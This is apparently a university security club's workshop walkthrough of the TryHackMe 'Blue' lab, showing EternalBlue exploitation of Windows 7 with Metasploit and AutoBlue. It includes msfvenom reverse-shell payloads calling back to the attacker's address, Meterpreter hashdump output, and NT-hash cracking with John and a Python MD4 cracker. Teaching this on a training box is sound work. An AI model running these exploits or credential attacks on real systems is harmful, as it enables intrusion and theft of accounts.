NYP InfoSec Introduction to Pentesting Workshop

TryHackMe | Blue

This workshop uses a TryHackMe lab in which we exploit CVE-2017-0144 (the SMBv1 bug patched by MS17-010 and exploited by EternalBlue) on a Windows 7 machine.


Exporting the IP as a shell variable to make life easier

export ip=10.10.24.176

We can then use $ip in the terminal wherever the target address is needed instead of typing it out in full (the address changes each time the lab machine is deployed, so set it once per session).

Task 1 [Recon]

Nmap Scan

nmap -A -T4 -vv -oN nmap.out $ip

-A: Aggressive scan: OS detection, version detection, default script scanning and traceroute (equivalent to -O -sV -sC --traceroute)

-T4: Timing template, from 0 (paranoid) to 5 (insane); higher is faster but drops more probes on a slow link, which is what the "Increasing send delay" line in the output below shows

-vv: Very verbose; among other things this adds the REASON column seen below

-oN: Write normal (human-readable) output to the given file

Redacted nmap output
# Nmap 7.92 scan initiated Thu Mar 10 19:57:12 2022 as: nmap -A -T4 -vv -oN nmap.out 10.10.24.176
Increasing send delay for 10.10.24.176 from 0 to 5 due to 26 out of 64 dropped probes since last increase.
Nmap scan report for 10.10.24.176
Host is up, received conn-refused (0.32s latency).
Scanned at 2022-03-10 19:57:13 +08 for 168s
Not shown: 991 closed tcp ports (conn-refused)
PORT      STATE SERVICE            REASON  VERSION
135/tcp   open  msrpc              syn-ack Microsoft Windows RPC
139/tcp   open  netbios-ssn        syn-ack Microsoft Windows netbios-ssn
445/tcp   open  microsoft-ds       syn-ack Windows 7 Professional 7601 Service Pack 1 microsoft-ds (workgroup: WORKGROUP)
3389/tcp  open  ssl/ms-wbt-server? syn-ack

Read data files from: /usr/bin/../share/nmap
Service detection performed. Please report any incorrect results at <https://nmap.org/submit/> .
# Nmap done at Thu Mar 10 20:00:01 2022 -- 1 IP address (1 host up) scanned in 168.71 seconds

Enumeration

Searching for "Windows 7 Professional 7601 Service Pack 1 exploit" leads to the Metasploit module for the SMBv1 bug this box is named after:

MS17-010 EternalBlue SMB Remote Windows Kernel Pool Corruption
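To make the banner-to-exploit reasoning above repeatable, here is an added Python example (not from the workshop and not part of nmap) that parses the port table of a normal-format nmap report and, when 445/tcp is open on a Windows host, hands back the nmap NSE script that actually verifies MS17-010 instead of guessing from the version string. The embedded report is the one from this page; the parser also accepts the default layout without the REASON column.

```python
import re

# Constructed sample: the host block and port table from the workshop's
# nmap -A -T4 -vv -oN output shown above (the -vv adds the REASON column).
NMAP_OUTPUT = """\
Nmap scan report for 10.10.24.176
Host is up, received conn-refused (0.32s latency).
Not shown: 991 closed tcp ports (conn-refused)
PORT      STATE SERVICE            REASON  VERSION
135/tcp   open  msrpc              syn-ack Microsoft Windows RPC
139/tcp   open  netbios-ssn        syn-ack Microsoft Windows netbios-ssn
445/tcp   open  microsoft-ds       syn-ack Windows 7 Professional 7601 Service Pack 1 microsoft-ds (workgroup: WORKGROUP)
3389/tcp  open  ssl/ms-wbt-server? syn-ack
"""

PORT_LINE = re.compile(r"^(\d+)/(tcp|udp)\s+(\S+)\s+(\S+)\s*(.*)$")


def parse_nmap_normal(text):
    """Parse the port table of an nmap -oN report into a list of dicts.

    Handles both layouts nmap prints: PORT STATE SERVICE VERSION (default)
    and PORT STATE SERVICE REASON VERSION (with -vv or --reason). The
    header line tells us which one we are looking at.
    """
    has_reason = False
    rows = []
    for line in text.splitlines():
        if line.startswith("PORT "):
            has_reason = "REASON" in line
            continue
        m = PORT_LINE.match(line)
        if not m:
            continue
        port, proto, state, service, rest = m.groups()
        reason = ""
        if has_reason:
            parts = rest.split(None, 1)
            reason = parts[0] if parts else ""
            rest = parts[1] if len(parts) > 1 else ""
        rows.append({
            "port": int(port), "proto": proto, "state": state,
            "service": service, "reason": reason, "version": rest.strip(),
        })
    return rows


def ms17_010_candidate(rows):
    """Triage rule from the workshop: an open 445/tcp with a Windows banner
    is worth an MS17-010 check. The banner alone cannot tell patched from
    unpatched (7601 SP1 is the build either way), so instead of guessing we
    return the nmap NSE script that actually probes for the vulnerability.
    """
    for r in rows:
        if r["proto"] != "tcp" or r["port"] != 445 or r["state"] != "open":
            continue
        if "Windows" in r["version"] or r["service"] == "microsoft-ds":
            return {
                "banner": r["version"],
                "verify": "nmap -p445 --script smb-vuln-ms17-010 $ip",
            }
    return None


if __name__ == "__main__":
    rows = parse_nmap_normal(NMAP_OUTPUT)
    for r in rows:
        print(f'{r["port"]}/{r["proto"]:<4} {r["state"]:<6} {r["service"]:<20} {r["version"]}')
    hit = ms17_010_candidate(rows)
    if hit:
        print("\nSMB banner:", hit["banner"])
        print("verify with:", hit["verify"])
```

The point of returning the verification command rather than a verdict is that a version banner is not evidence of patch level: a fully patched Windows 7 SP1 box shows the same 7601 string, and only the SMB probe (here nmap's smb-vuln-ms17-010 script, or AutoBlue's eternal_checker.py used later on this page) settles it.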

Task 2 [Gain Access]

Gaining Shell

msfconsole -q
use windows/smb/ms17_010_eternalblue
set payload windows/x64/shell/reverse_tcp
show options

Module options to set

RHOSTS: Remote host(s), the victim machine's IP address (our $ip)

LHOST: Listen host, our attacking machine's address on the TryHackMe VPN interface (tun0), which is where the reverse shell connects back to

set RHOSTS <VICTIM_IP>
set LHOST <ATTACKER_IP>

Confirm that the exploit worked: once exploit returns a command shell, whoami should print nt authority\system

exploit
whoami

Note: The exploit is implemented by the Metasploit module ms17_010_eternalblue.rb, which is out of scope for this workshop. The GitHub link is attached below for reference if anyone is interested in learning more.

metasploit-framework/ms17_010_eternalblue.rb at master · rapid7/metasploit-framework

Task 3 [Escalate]

Upgrading command shell to Meterpreter

Why? Meterpreter gives us post-exploitation commands such as getuid, ps, migrate, hashdump and search, instead of only the Windows command prompt.

How?

Background the current session, then use post/multi/manage/shell_to_meterpreter to upgrade it to a Meterpreter session

Ctrl + Z to background the shell (answer y when asked whether to background the session)

use post/multi/manage/shell_to_meterpreter
sessions
show options
set SESSION <SESSION NUMBER>
run

Note: The module uses the Metasploit shell_to_meterpreter.rb script, which is out of scope for the workshop. The GitHub URL is attached below for reference if anyone is interested in learning more.

metasploit-framework/shell_to_meterpreter.rb at master · rapid7/metasploit-framework

Swap to the Meterpreter session once the post module reports that it has opened one

sessions -l
sessions -i 2

sessions -l lists all active sessions

sessions -i interacts with the supplied session ID; here the new Meterpreter session is ID 2 (the original command shell is still session 1)

Confirm that the Meterpreter shell works and that we are NT AUTHORITY\SYSTEM

getuid
Server username: NT AUTHORITY\SYSTEM

Migrating Process

getuid reports NT AUTHORITY\SYSTEM, but the process the EternalBlue payload landed in is not necessarily a stable one, and hashdump can fail with an error from it. Migrate into a long-lived process that ps lists under NT AUTHORITY\SYSTEM (spoolsv.exe or winlogon.exe are common choices); the PID differs on every boot, so read it from ps instead of copying the number below.

hashdump (may fail before migrating)

ps
migrate 700

Dumping User Hashes

hashdump

Task 4 [Cracking]

Identifying the type of hash

Administrator:500:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
Jon:1000:aad3b435b51404eeaad3b435b51404ee:ffb43f0de35be4d9917ac0cc8ad57f8d:::

Google "windows 7 password hash format"

Understanding Windows local password hashes (NTLM)

From the StackExchange answer we learn that each line is user:RID:LM hash:NT hash:::, so the value we care about is the fourth field, the NT (MD4) hash

Cracking the hash

First, save the dumped lines into a file called password_hash, then run John the Ripper against the NT field with the rockyou.txt wordlist

john --format=nt --wordlist=/usr/share/wordlists/rockyou.txt password_hash

John recovers Jon's password from rockyou.txt; john --show --format=nt password_hash prints the cracked credentials again later

To learn more about Windows LM hash, refer to this article.

You Gotta Hack That | Penetration Testing Consultancy

Why did john report nothing for Administrator and Guest?

With --format=nt john only looks at the NT field, so the LM field is irrelevant to the result. aad3b435b51404eeaad3b435b51404ee in the LM field is the placeholder stored when no LM hash exists (LM hashing is off by default since Windows Vista), and 31d6cfe0d16ae931b73c59d7e0c089c0 in the NT field is the NT hash of an empty password, i.e. MD4 of the empty string. Both accounts have a blank password (and are disabled by default on Windows 7), so there is nothing for a wordlist attack to find.
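The following Python example is added here and is not part of the workshop. It reimplements what john --format=nt does behind the scenes: the NT hash is MD4 over the UTF-16LE password with no salt, so cracking is a straight lookup of candidate hashes. MD4 is implemented in pure Python for this example (hashlib.new("md4") needs OpenSSL's legacy provider on recent distributions). The three hashdump lines are the ones above; the alice account, its password "password", and the three-word wordlist are constructed so a wordlist hit is visible. Jon's real hash is included, but his password is not in the constructed list, so he stays uncracked here.

```python
import struct


def md4(data):
    """Pure-Python MD4 (RFC 1320). Written for this example so it runs without
    hashlib.new("md4"), which needs OpenSSL's legacy provider on recent systems."""
    mask = 0xFFFFFFFF
    rol = lambda x, n: ((x << n) | (x >> (32 - n))) & mask
    F = lambda x, y, z: (x & y) | (~x & z)
    G = lambda x, y, z: (x & y) | (x & z) | (y & z)
    H = lambda x, y, z: x ^ y ^ z

    # Padding: 0x80, zeros up to 56 mod 64, then the bit length as 64-bit little-endian.
    bit_len = len(data) * 8
    data += b"\x80"
    data += b"\x00" * ((56 - len(data) % 64) % 64)
    data += struct.pack("<Q", bit_len)

    state = [0x67452301, 0xEFCDAB89, 0x98BADCFE, 0x10325476]
    rounds = (
        (F, 0x00000000, list(range(16)), (3, 7, 11, 19)),
        (G, 0x5A827999, [0, 4, 8, 12, 1, 5, 9, 13, 2, 6, 10, 14, 3, 7, 11, 15], (3, 5, 9, 13)),
        (H, 0x6ED9EBA1, [0, 8, 4, 12, 2, 10, 6, 14, 1, 9, 5, 13, 3, 11, 7, 15], (3, 9, 11, 15)),
    )
    for off in range(0, len(data), 64):
        X = struct.unpack("<16I", data[off:off + 64])
        v = state[:]
        for fn, const, order, shifts in rounds:
            for i, k in enumerate(order):
                idx = (-i) % 4  # the register being updated cycles a, d, c, b
                x, y, z, w = (v[(idx + j) % 4] for j in range(4))
                v[idx] = rol((x + fn(y, z, w) + X[k] + const) & mask, shifts[i % 4])
        state = [(s + t) & mask for s, t in zip(state, v)]
    return struct.pack("<4I", *state)


def nt_hash(password):
    """NT hash = MD4 over the UTF-16LE password. No salt, so equal passwords
    give equal hashes and one precomputed lookup table serves every account."""
    return md4(password.encode("utf-16-le")).hex()


EMPTY_LM = "aad3b435b51404eeaad3b435b51404ee"  # LM field when no LM hash is stored
EMPTY_NT = nt_hash("")                         # 31d6cfe0d16ae931b73c59d7e0c089c0


def parse_pwdump(text):
    """Parse user:RID:LMhash:NThash::: lines as printed by meterpreter's hashdump."""
    entries = []
    for line in text.splitlines():
        parts = line.strip().split(":")
        if len(parts) < 4:
            continue
        entries.append({"user": parts[0], "rid": int(parts[1]),
                        "lm": parts[2].lower(), "nt": parts[3].lower()})
    return entries


def crack(entries, wordlist):
    """Dictionary attack on the NT field only, which is what john --format=nt
    does. Returns {user: password}. The blank-password hash is matched
    explicitly so accounts with no password are reported even when the
    wordlist contains no empty line."""
    table = {nt_hash(word): word for word in wordlist}
    table[EMPTY_NT] = ""
    return {e["user"]: table[e["nt"]] for e in entries if e["nt"] in table}


# The three hashdump lines from the workshop plus one constructed account
# (alice, password "password") so that a wordlist hit is visible.
HASHDUMP = """\
Administrator:500:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
Jon:1000:aad3b435b51404eeaad3b435b51404ee:ffb43f0de35be4d9917ac0cc8ad57f8d:::
alice:1001:aad3b435b51404eeaad3b435b51404ee:8846f7eaee8fb117ad06bdd830b7586c:::
"""
WORDLIST = ["123456", "password", "letmein"]  # constructed stand-in for rockyou.txt

if __name__ == "__main__":
    entries = parse_pwdump(HASHDUMP)
    found = crack(entries, WORDLIST)
    for e in entries:
        lm_note = "no LM hash" if e["lm"] == EMPTY_LM else "LM hash present"
        result = repr(found[e["user"]]) if e["user"] in found else "not in wordlist"
        print(f'{e["user"]:<14} {lm_note:<16} {result}')
```

Running it prints one line per account: Administrator and Guest crack to the empty string before the wordlist is even consulted, alice falls to the second word, and Jon is reported as not in the (tiny) wordlist. The absence of a salt is also why the lookup table is built once and reused for every account: with real SAM dumps the same trick scales to thousands of hashes for the price of hashing the wordlist once.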

Task 5 [Find Flags!]

search -f flag*txt

c:\flag1.txt (24 bytes)
c:\Users\Jon\Documents\flag3.txt (37 bytes)
c:\Windows\System32\config\flag2.txt (34 bytes)

Challenge

Attempt to exploit the machine without using Metasploit!

You are all encouraged to explore different methods to hack into the box without relying on Metasploit.

Installing Requirements

git clone https://github.com/3ndG4me/AutoBlue-MS17-010
cd AutoBlue-MS17-010
pip3 install -r requirements.txt

Checking whether the machine is vulnerable to EternalBlue

python3 eternal_checker.py $ip
[*] Target OS: Windows 7 Ultimate 7601 Service Pack 1
[!] The target is not patched
=== Testing named pipes ===
[*] Done

Compiling Shellcode

cd shellcode
./shell_prep.sh
                 _.-;;-._
          '-..-'|   ||   |
          '-..-'|_.-;;-._|
          '-..-'|   ||   |
          '-..-'|_.-''-._|   
Eternal Blue Windows Shellcode Compiler

Let's compile them windoos shellcodezzz

Compiling x64 kernel shellcode
Compiling x86 kernel shellcode
kernel shellcode compiled, would you like to auto generate a reverse shell with msfvenom? (Y/n)
y
LHOST for reverse connection:
10.8.53.141
LPORT you want x64 to listen on:
4444
LPORT you want x86 to listen on:
5555
Type 0 to generate a meterpreter shell or 1 to generate a regular cmd shell
1
Type 0 to generate a staged payload or 1 to generate a stageless payload
1
Generating x64 cmd shell (staged)...

msfvenom -p windows/x64/shell/reverse_tcp -f raw -o sc_x64_msf.bin EXITFUNC=thread LHOST=10.8.53.141 LPORT=4444
[-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload
[-] No arch selected, selecting arch: x64 from the payload
No encoder specified, outputting raw payload
Payload size: 511 bytes
Saved as: sc_x64_msf.bin

Generating x86 cmd shell (staged)...

msfvenom -p windows/shell/reverse_tcp -f raw -o sc_x86_msf.bin EXITFUNC=thread LHOST=10.8.53.141 LPORT=5555
[-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload
[-] No arch selected, selecting arch: x86 from the payload
No encoder specified, outputting raw payload
Payload size: 362 bytes
Saved as: sc_x86_msf.bin

MERGING SHELLCODE WOOOO!!!
DONE

Preparing the listener (following the instructions)

cd ../
./listener_prep.sh 
  __
  /,-
  ||)
  \_, )
   `--'
Enternal Blue Metasploit Listener

LHOST for reverse connection:
10.8.53.141
LPORT for x64 reverse connection:
4444
LPORT for x86 reverse connection:
5555
Enter 0 for meterpreter shell or 1 for regular cmd shell:
1
Type 0 if this is a staged payload or 1 if it is for a stageless payload
1
Starting listener (staged)...
Starting postgresql (via systemctl): postgresql.service.
                                                  
                                   ____________
 [%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%| $a,        |%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%]
 [%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%| $S`?a,     |%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%]
 [%%%%%%%%%%%%%%%%%%%%__%%%%%%%%%%|       `?a, |%%%%%%%%__%%%%%%%%%__%%__ %%%%]
 [% .--------..-----.|  |_ .---.-.|       .,a$%|.-----.|  |.-----.|__||  |_ %%]
 [% |        ||  -__||   _||  _  ||  ,,aS$""`  ||  _  ||  ||  _  ||  ||   _|%%]
 [% |__|__|__||_____||____||___._||%$P"`       ||   __||__||_____||__||____|%%]
 [%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%| `"a,       ||__|%%%%%%%%%%%%%%%%%%%%%%%%%%]
 [%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%|____`"a,$$__|%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%]
 [%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%        `"$   %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%]
 [%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%]

       =[ metasploit v5.0.101-dev                         ]
+ -- --=[ 2048 exploits - 1105 auxiliary - 344 post       ]
+ -- --=[ 564 payloads - 45 encoders - 10 nops            ]
+ -- --=[ 7 evasion                                       ]

Metasploit tip: Use help <command> to learn more about any command

[*] Processing config.rc for ERB directives.
resource (config.rc)> use exploit/multi/handler
[*] Using configured payload generic/shell_reverse_tcp
resource (config.rc)> set PAYLOAD windows/x64/shell/reverse_tcp
PAYLOAD => windows/x64/shell/reverse_tcp
resource (config.rc)> set LHOST 10.8.53.141
LHOST => 10.8.53.141
resource (config.rc)> set LPORT 4444
LPORT => 4444
resource (config.rc)> set ExitOnSession false
ExitOnSession => false
resource (config.rc)> set EXITFUNC thread
EXITFUNC => thread
resource (config.rc)> exploit -j
[*] Exploit running as background job 0.
[*] Exploit completed, but no session was created.
resource (config.rc)> set PAYLOAD windows/shell/reverse_tcp
PAYLOAD => windows/shell/reverse_tcp
[*] Started reverse TCP handler on 10.8.53.141:4444 
resource (config.rc)> set LPORT 5555
LPORT => 5555
resource (config.rc)> exploit -j
[*] Exploit running as background job 1.
[*] Exploit completed, but no session was created.

[*] Started reverse TCP handler on 10.8.53.141:5555

Alternatively, use a netcat listener instead of the Metasploit handler. This only works with a stageless payload (windows/x64/shell_reverse_tcp and windows/shell_reverse_tcp): a staged payload such as the windows/x64/shell/reverse_tcp that the msfvenom lines above actually generated expects the Metasploit handler to send the second stage, and with netcat you would only get a connection that hangs.

nc -nvlp 4444
nc -nvlp 5555

PWN the target!

Open a new terminal tab (leave the listener running) and fire the exploit with the merged shellcode. When it prints done, switch back to the listener tab, where the reverse shell arrives.

python3 eternalblue_exploit7.py $ip shellcode/sc_all.bin

shellcode size: 2294
numGroomConn: 13
Target OS: Windows 7 Professional 7601 Service Pack 1
SMB1 session setup allocate nonpaged pool success
SMB1 session setup allocate nonpaged pool success
good response status: INVALID_PARAMETER
done

GitHub Link: AutoBlue's exploit scripts are derived from worawit's MS17-010 repository, which documents the exploit in detail:

https://github.com/worawit/MS17-010

Closing Thoughts

I hope you all enjoyed the demonstration during the workshop, and managed to learn a few things!

If you have any questions or doubts, feel free to reach out to me at Kabinet#1553 on Discord.

I will be happy to connect with you all on LinkedIn at https://www.linkedin.com/in/edwinczd/
